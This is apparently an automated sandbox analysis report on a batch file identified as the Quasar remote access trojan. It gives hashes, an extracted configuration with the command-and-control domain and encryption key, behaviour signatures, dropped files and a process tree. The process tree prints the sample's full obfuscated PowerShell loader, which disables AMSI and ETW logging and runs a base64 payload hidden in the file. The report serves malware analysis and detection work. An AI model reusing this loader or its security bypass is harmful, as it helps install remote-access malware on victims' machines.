Analysis

  • max time kernel
    138s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    25-11-2024 23:53

General

  • Target

    Client-built.exe.bat

  • Size

    4.2MB

  • MD5

    e8f9b123f6368338546d660e983af6b0

  • SHA1

    d622ddcfbba5060244816540768925563a7c66c3

  • SHA256

    4a664bab85afe1b3d5013278ba99280506c1eb42bac4e7b23bcc932eda627c8b

  • SHA512

    6ad576a2dd1e73b2eb18c240bd4ac824850e431d800fc2d8c520f6a2b1ea8d50d01c008bcab5cb1cc5189f120fd331870fa25925a2994a8c1e84e265492e9f5c

  • SSDEEP

    49152:eDzoesdQ9TpsKmiB/J73/gnGKmTi5wU50WU:Q

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

fr

C2

kdotisbetterfr.airdns.org:61875

Mutex

de3f242e-9b27-4bcc-b108-2b89973fa679

Attributes
  • encryption_key

    A9E1D2CBD6699561DDC6C38CE5B7E79D283DC83E

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Uses the powershell.exe command interpreter.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2704
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat';if (.([char](((-18989 -Band 4925) + (-18989 -Bor 4925) + 5167 + 8981))+[char]((15592 - 5449 - 5372 - 4670))+[char]((7757 - 4149 - 3692 + 199))+[char]((6189 - 5510 - 4827 + 4264))+[char](((-712 -Band 8324) + (-712 -Bor 8324) - 9313 + 1746))+[char](((-4636 -Band 8829) + (-4636 -Bor 8829) - 9840 + 5727))+[char]((21086 - 6295 - 9972 - 4722))+[char]((13029 - 9372 + 5383 - 8924))+[char](((2214 -Band 3002) + (2214 -Bor 3002) + 14 - 5126))) ([SySTEM.Text.eNcODiNg]::UTf8.geTStRiNg([syStem.cOnVERt]::FROmBaSe64STRINg('JEVOVjp1c2VycHJvZmlsZVxE')) + [SySteM.teXt.encOding]::UTF8.geTStriNg((0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x5c, 0x52, 0x65, 0x73, 0x75, 0x6d, 0x65)) + [syStem.tEXT.encODing]::uTF8.gEtstRing((0x47, 0x72, 0x61, 0x6e, 0x74, 0x2e, 0x73, 0x79, 0x73)))) { exit };${kdOtLCJrxpwvng}=([systEM.tExt.eNcoDinG]::utf8.GeTSTrINg((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46)) + [SySTEm.TeXt.ENCOding]::UTF8.geTsTRIng([SysTem.conVeRt]::fROmbaSe64StRINg('QXV0b21hdGlvbi5BbXNpVXRpbHM=')));${k`DotvllZJgLtgx}=([SystEM.tEXt.ENcODInG]::uTF8.GETstrInG([sYStEm.COnVeRT]::FrOmbaSe64strIng('YW1zaUluaXRGYWlsZWQ=')));${KdOteJyma`PyhoD}=[REF].AssEmblY;${kdOtap`Yr`KnuXkZ}=${kdOt`EJYMapYHOD}.geTtype(${k`Dotl`CjrxpwvnG});$kdoTgnaGLeanqB=${kdoTaPyrkn`UXKz}.geTfIELD(${KdotvL`Lz`JgLtgx},([SysTeM.tExt.EnCODING]::uTF8.geTStrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));$KdOtgNaGLeanQb.sEtvaLUE($nULl,([BOol][chaR]));([REflEcTion.ASsemBlY]::LOaDwIthpARtIALnaME(((([sySTEM.text.eNcOdiNg]::utF8.GETStRing((0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x43, 0x6f, 0x72, 0x65)))))).GeTTYPe(((([SyStEm.TeXT.ENcOdING]::utF8.geTSTRInG((83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105)) + [syStem.TExT.EncoDing]::utF8.gEtSTRing((99, 115, 46, 69, 118, 101, 110, 116, 105, 110, 103, 46, 69, 
118, 101, 110, 116, 80, 114, 111)) + [SysTEm.tEXT.ENCOdinG]::UTF8.GETstring((0x76, 0x69, 0x64, 0x65, 0x72)))))).GETfIeLD(((([sYsTeM.TeXt.ENcOdiNg]::Utf8.GeTstRiNG((109, 95)) + [sySteM.texT.enCODInG]::UTF8.GEtSTring((0x65, 0x6e, 0x61, 0x62)) + [sYsTem.TeXt.eNCOdIng]::UTf8.geTSTRING((108, 101, 100))))),((([system.TeXt.EncOdInG]::utF8.gEtSTRinG((78, 111, 110, 80, 117, 98, 108, 105, 99, 44, 73, 110, 115, 116, 97, 110, 99, 101)))))).SetVaLuE([Ref].ASsEmbly.getType(((([systEm.Text.ENcODIng]::uTF8.GeTStriNG((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 84, 114, 97, 99, 105)) + [SYSteM.TEXT.ENCodIng]::Utf8.GEtSTrinG((0x6e, 0x67, 0x2e, 0x50, 0x53, 0x45, 0x74, 0x77, 0x4c, 0x6f, 0x67, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72)))))).GetfielD(((([SySTEM.teXT.eNcODiNG]::utf8.gETStRing((0x65, 0x74, 0x77, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72))))),((([SysTeM.TEXt.ENCoDInG]::utf8.gEtsTRinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63)))))).GetVAluE($nULl),0));.([char]((-257 - 1031 + 9766 - 8373))+[char]((1823 - 9768 + 8223 - 177))+[char](((-19562 -Band 889) + (-19562 -Bor 889) + 9885 + 8908))) ([tEXT.encodIng]::UTF8.gEtSTrING([CoNvErt]::FroMBAse64StriNg((.([char]((11498 - 2401 - 178 - 8848))+[char]((-11105 - 5194 + 7505 + 8895))+[char]((222 - 4618 + 153 + 4359))+[char]((-2637 - 1093 + 9286 - 5511))+[char](((-4650 -Band 9781) + (-4650 -Bor 9781) - 1475 - 3589))+[char]((3131 - 3111 + 154 - 63))+[char]((18786 - 6317 - 8092 - 4267))+[char](((-2844 -Band 5727) + (-2844 -Bor 5727) - 703 - 2064))+[char]((7821 - 9012 - 6084 + 7376))+[char]((4558 - 872 + 4205 - 7781))+[char](((15508 -Band 482) + (15508 -Bor 482) - 7709 - 8165))) $KDot_file -raw | .([char]((11950 - 980 - 4943 - 5944))+[char](((-8135 -Band 6460) + (-8135 -Bor 6460) - 479 + 2255))+[char](((-13228 -Band 3952) + (-13228 -Bor 3952) + 547 + 8837))+[char](((-19627 -Band 1554) + 
(-19627 -Bor 1554) + 9787 + 8387))+[char](((-21855 -Band 6576) + (-21855 -Bor 6576) + 9605 + 5773))+[char](((10719 -Band 1622) + (10719 -Bor 1622) - 4422 - 7803))+[char](((15556 -Band 721) + (15556 -Bor 721) - 9597 - 6635))+[char](((4849 -Band 877) + (4849 -Bor 877) - 2305 - 3338))+[char](((-13113 -Band 8015) + (-13113 -Bor 8015) + 3741 + 1473))+[char]((-17 - 8310 + 8801 - 360))+[char](((-8482 -Band 1532) + (-8482 -Bor 1532) + 8379 - 1324))+[char]((-1608 - 2948 - 4299 + 8965))+[char](((-7699 -Band 8648) + (-7699 -Bor 8648) + 538 - 1384))) (([SySTem.teXt.eNcOdiNg]::UTf8.GEtsTrinG(58)) + ([SyStem.TExT.ENcodinG]::utf8.gETstRINg([sYstem.cOnVert]::FRoMbaSe64strIng('OktET1Q6OiguKik='))))).MAtcHeS.GrouPS[1].vaLuE)))"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2204
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lg4b3vrz\lg4b3vrz.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBFC6.tmp" "c:\Users\Admin\AppData\Local\Temp\lg4b3vrz\CSCAEB787F0BB5349E7B5CCBF8C61A38389.TMP"
          4⤵
            PID:4596

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESBFC6.tmp

      Filesize

      1KB

      MD5

      b9bba2d809fb179993540adba01505bc

      SHA1

      d8d118f4ff81d65f45b9a4ee87d6905cd3f4a441

      SHA256

      6a4d92852b7fe4a54becffb02d31d5f2ba8675a1e593998eedea926185bc5587

      SHA512

      a04ed4a35367eaee3f8cfaad83ea6e58c92572e81eb6a9ef23bb5c50d6dddf8ddb517f4862d11d524cdfd8adf419fd0f9bae21b741aef57df4cf885dbdb3d88c

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xdt1vmbj.43g.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\lg4b3vrz\lg4b3vrz.dll

      Filesize

      8KB

      MD5

      5290ae31d21e43e604ca3294ec93c459

      SHA1

      3919e53f93061c7e3d0aed8f3da091893088680e

      SHA256

      5d287b44b2a24e797edc4742a665f1cf4266c5104d54bf536aa3829c6082d4fc

      SHA512

      a9061b004a76c72742cc3a4ba0453c317c0816bdecc3e53d7748776a1bee2c562c9503d78f1efde1d97f00b2350c1241ec145562669b39e5b95a5626a7906da3

    • \??\c:\Users\Admin\AppData\Local\Temp\lg4b3vrz\CSCAEB787F0BB5349E7B5CCBF8C61A38389.TMP

      Filesize

      652B

      MD5

      5a4ec8b39ebd2d392676303be149cd14

      SHA1

      9f791e03d8499645dff0f61b497c360d01fb0235

      SHA256

      0d711297c705e52a9c7ffa6e82f82b3adec3590889fdf7e2b17d684755d2a383

      SHA512

      db157d49cbb1dcea22295252db2d80072cb4e8ce11b5952ac22c388f75fcebe8fef49ae92e53af5b1f14332645c9e386652b5b54d435b4658bcc15db5321e39b

    • \??\c:\Users\Admin\AppData\Local\Temp\lg4b3vrz\lg4b3vrz.0.cs

      Filesize

      11KB

      MD5

      2baccf8bd40aaee5659a70165d301596

      SHA1

      52f6af554b3df57db81005dd6360f4bc39b93531

      SHA256

      6c6ca5f865d9346cd32d84e0122d1bf08051d8b53c47208cef44bd2bb6133884

      SHA512

      dfbe57879f918c029dc628cc27961d63eca88104e8e7fb3aba8c2d1696419d5010c2dfc7e690669835fa50a0344f1ec5f60f714db95112b18c8524e87d1bb51a

    • \??\c:\Users\Admin\AppData\Local\Temp\lg4b3vrz\lg4b3vrz.cmdline

      Filesize

      369B

      MD5

      5741858b4db283db323fdc3ac09f6b94

      SHA1

      3aa932ea54aafbac75a88c68669a697aef6684d1

      SHA256

      e2cffd70771a29c1cf7407880f392c3ae075dbcca52cf6cecc38caf2529a6166

      SHA512

      7006ee786d03f3545b2fd81b0bdf87fc721b09001b498c3b50c64a5dd9cb7ef403d076ae17ca0fd05ad79ab8f3ac585bf9e67b700d5c5aa847782d1ddb64eeb4

    • memory/2204-26-0x000002B61A250000-0x000002B61A258000-memory.dmp

      Filesize

      32KB

    • memory/2204-29-0x00007FFF2B5F0000-0x00007FFF2C0B1000-memory.dmp

      Filesize

      10.8MB

    • memory/2204-12-0x00007FFF2B5F0000-0x00007FFF2C0B1000-memory.dmp

      Filesize

      10.8MB

    • memory/2204-11-0x00007FFF2B5F0000-0x00007FFF2C0B1000-memory.dmp

      Filesize

      10.8MB

    • memory/2204-0-0x00007FFF2B5F3000-0x00007FFF2B5F5000-memory.dmp

      Filesize

      8KB

    • memory/2204-6-0x000002B67FEE0000-0x000002B67FF02000-memory.dmp

      Filesize

      136KB

    • memory/2204-28-0x00007FFF2B5F3000-0x00007FFF2B5F5000-memory.dmp

      Filesize

      8KB

    • memory/2204-13-0x00007FFF2B5F0000-0x00007FFF2C0B1000-memory.dmp

      Filesize

      10.8MB

    • memory/2204-30-0x00007FFF2B5F0000-0x00007FFF2C0B1000-memory.dmp

      Filesize

      10.8MB

    • memory/2204-31-0x00007FFF2B5F0000-0x00007FFF2C0B1000-memory.dmp

      Filesize

      10.8MB

    • memory/2204-32-0x000002B61A8A0000-0x000002B61ABC4000-memory.dmp

      Filesize

      3.1MB

    • memory/2204-33-0x000002B67FF60000-0x000002B67FFB0000-memory.dmp

      Filesize

      320KB

    • memory/2204-34-0x000002B680070000-0x000002B680122000-memory.dmp

      Filesize

      712KB

    • memory/2204-35-0x000002B680300000-0x000002B6804C2000-memory.dmp

      Filesize

      1.8MB